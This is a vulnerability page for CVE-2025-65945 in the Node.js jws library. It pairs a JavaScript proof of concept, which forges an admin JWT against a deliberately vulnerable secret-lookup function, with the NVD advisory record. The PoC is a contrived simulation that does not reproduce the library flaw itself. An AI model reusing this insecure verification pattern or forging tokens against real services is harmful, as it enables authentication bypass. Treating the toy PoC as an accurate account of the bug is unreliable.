CVE-2025-65945

const jws = require('jws'); // Simulate vulnerable code pattern // This PoC demonstrates how an attacker can bypass signature verification // when user-controlled header/payload data is used in HMAC secret lookup // Vulnerable verification pattern (DO NOT USE) function vulnerableVerify(token, userProvidedKid) { // Attack scenario: userProvidedKid comes from JWT header/payload // and is used directly in secret lookup const secret = secretLookup(userProvidedKid); // Attacker controlled return jws.verify(token, 'HS256', secret); } function secretLookup(kid) { // In vulnerable apps, this might use user-provided kid directly // Attacker can use known kid or manipulate this lookup const secrets = { 'attacker_controlled': 'attacker_secret_key', 'default': 'default_secret' }; return secrets[kid] || 'fallback_secret'; } // Attacker creates malicious token const maliciousPayload = { kid: 'attacker_controlled', // Controls secret lookup alg: 'HS256', // Must use HS256 sub: 'admin' // Try to escalate privileges }; // Sign with attacker's known secret const maliciousToken = jws.sign({ header: { alg: 'HS256', kid: 'attacker_controlled' }, payload: { user: 'admin', role: 'administrator' }, secret: 'attacker_secret_key' // Attacker knows this secret }); // Verification bypassed! const result = vulnerableVerify(maliciousToken, 'attacker_controlled'); console.log('Verification result:', result); // Returns true incorrectly

{"cve": {"id": "CVE-2025-65945", "sourceIdentifier": "[email protected]", "published": "2025-12-04T19:16:05.550", "lastModified": "2026-03-09T21:19:08.997", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "auth0/node-jws is a JSON Web Signature implementation for Node.js. In versions 3.2.2 and earlier and version 4.0.0, auth0/node-jws has an improper signature verification vulnerability when using the HS256 algorithm under specific conditions. Applications are affected when they use the jws.createVerify() function for HMAC algorithms and use user-provided data from the JSON Web Signature protected header or payload in HMAC secret lookup routines, which can allow attackers to bypass signature verification. This issue has been patched in versions 3.2.3 and 4.0.1."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-347"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:auth0:node-jws:*:*:*:*:*:node.js:*:*", "versionEndExcluding": "3.2.2", "matchCriteriaId": "B7BCA89D-5E1C-419F-8C94-E2AF02CC070C"}, {"vulnerable": true, "criteria": "cpe:2.3:a:auth0:node-jws:4.0.0:*:*:*:*:node.js:*:*", "matchCriteriaId": "BD4CB854-F566-459E-A79C-7ED9CD64A8CC"}]}]}], "references": [{"url": "https://github.com/auth0/node-jws/commit/34c45b2c04434f925b638de6a061de9339c0ea2e", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/auth0/node-jws/security/advisories/GHSA-869p-cjfg-cm3x", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}